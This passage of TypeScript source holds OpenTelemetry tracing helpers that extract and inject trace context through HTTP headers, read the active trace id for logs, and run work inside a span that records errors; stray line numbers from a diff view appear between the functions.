export function ctxFromHeaders(headers: Headers): Context {
  // The propagator reads from a plain string map, so copy the headers into one.
  const carrier: Record<string, string> = {};
  for (const [name, value] of headers.entries()) {
    carrier[name] = value;
  }
  return propagation.extract(context.active(), carrier);
}
50
+
51
/**
 * Write the active trace context into an outbound header map for downstream propagation.
 *
 * @param h Header map to mutate; a fresh object is used when omitted.
 * @returns The same map, for chaining.
 */
export function injectHeaders(h: Record<string, string> = {}): Record<string, string> {
  const active = context.active();
  propagation.inject(active, h);
  return h;
}
56
+
57
/**
 * The trace id of the active context, for stamping into structured logs.
 *
 * @returns The trace id, or undefined when there is no span context or the id is
 *   the all-zero (invalid) trace id.
 */
export function activeTraceId(): string | undefined {
  const spanContext = trace.getSpanContext(context.active());
  if (!spanContext) return undefined;
  if (spanContext.traceId === "00000000000000000000000000000000") return undefined;
  return spanContext.traceId;
}
62
+
63
/**
 * Run `fn` inside a new span and end the span when `fn` settles.
 *
 * @param name Span name.
 * @param parent Context to parent the span under; the active context when undefined.
 * @param attrs Attributes set on the span at creation.
 * @param fn Work to run with the span active; receives the span.
 * @param kind Span kind. Default INTERNAL; set SERVER on ingress handlers and CLIENT on
 *   outbound calls so the service graph + Traces-Drilldown "structure" view can build the
 *   trace hierarchy (those views key off SERVER spans with CLIENT edges; INTERNAL-only
 *   traces show no structure).
 * @returns Whatever `fn` resolves to.
 * @throws Rethrows any error from `fn` after recording it on the span with ERROR status.
 */
export async function withSpan<T>(
  name: string,
  parent: Context | undefined,
  attrs: Record<string, string | number | boolean>,
  fn: (span: Span) => Promise<T> | T,
  kind: SpanKind = SpanKind.INTERNAL,
): Promise<T> {
  const parentCtx = parent ?? context.active();
  const span = tracer().startSpan(name, { kind, attributes: attrs }, parentCtx);
  // Make the new span the active one for the duration of `fn`.
  const scoped = trace.setSpan(parentCtx, span);
  try {
    const result = await context.with(scoped, () => fn(span));
    return result;
  } catch (err) {
    span.recordException(err as Error);
    span.setStatus({ code: SpanStatusCode.ERROR, message: String(err) });
    throw err;
  } finally {
    span.end();
  }
}